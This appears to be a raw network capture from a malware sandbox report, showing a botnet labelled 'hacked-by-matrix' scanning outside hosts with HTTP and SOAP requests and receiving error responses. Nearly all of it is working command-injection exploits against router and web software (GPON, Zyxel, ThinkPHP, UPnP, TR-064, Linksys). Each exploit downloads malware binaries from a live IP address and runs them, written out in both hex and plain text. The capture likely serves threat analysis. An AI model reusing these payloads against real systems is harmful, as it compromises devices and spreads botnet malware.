                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        881192.168.2.13448063.18.60.2280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:04.796874046 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:05.124512911 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:05.226255894 CET284INHTTP/1.1 400 Bad Request
                                                        Server: awselb/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 122
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        882192.168.2.1338042213.99.176.19680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.052699089 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:07.889336109 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:10.025731087 CET491INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Date: Thu, 21 Mar 2024 04:23:07 GMT
                                                        Server: lighttpd/1.4.45
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        883192.168.2.134423695.101.251.8780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.166969061 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:21.775002956 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:29.358191013 CET522INHTTP/1.0 408 Request Time-out
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Date: Thu, 21 Mar 2024 04:23:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 314
                                                        Expires: Thu, 21 Mar 2024 04:23:29 GMT
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 48 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 74 69 6d 65 64 20 6f 75 74 20 77 68 69 6c 65 20 77 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 62 72 6f 77 73 65 72 27 73 20 72 65 71 75 65 73 74 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 32 26 23 34 36 3b 36 65 33 66 36 35 35 66 26 23 34 36 3b 31 37 31 30 39 39 35 30 30 39 26 23 34 36 3b 30 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 32 26 23 34 36 3b 36 65 33 66 36 35 35 66 26 23 34 36 3b 31 37 31 30 39 39 35 30 30 39 26 23 34 36 3b 30 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Request Timeout</TITLE></HEAD><BODY><H1>Request Timeout</H1>The server timed out while waiting for the browser's request.<P>Reference&#32;&#35;2&#46;6e3f655f&#46;1710995009&#46;0<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;2&#46;6e3f655f&#46;1710995009&#46;0</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        884192.168.2.1359328197.203.156.687547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.185125113 CET512OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr06
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        885192.168.2.1347682172.65.128.558080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.272537947 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:05.843322992 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        886192.168.2.134459823.48.158.21080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.451827049 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:06.455581903 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:07.436229944 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:07.757514000 CET430INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 208
                                                        Expires: Thu, 21 Mar 2024 04:23:07 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:07 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 35 62 39 32 39 31 37 26 23 34 36 3b 31 37 31 30 39 39 34 39 38 37 26 23 34 36 3b 36 61 39 66 39 31 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;85b92917&#46;1710994987&#46;6a9f91d</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        887192.168.2.135168452.203.198.8380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.557837009 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:05.663646936 CET284INHTTP/1.1 400 Bad Request
                                                        Server: awselb/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 122
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        888192.168.2.13510185.226.254.251443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.676440954 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        889192.168.2.133811842.143.52.67443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.676465034 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        890192.168.2.1346324118.201.165.94443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.676480055 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        891192.168.2.13420445.77.231.49443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.676481009 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        892192.168.2.134841434.149.110.18980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:05.899384975 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        893192.168.2.135167452.203.198.8380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:06.223748922 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:06.733447075 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:06.828265905 CET284INHTTP/1.1 400 Bad Request
                                                        Server: awselb/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:06 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 122
                                                        Connection: close
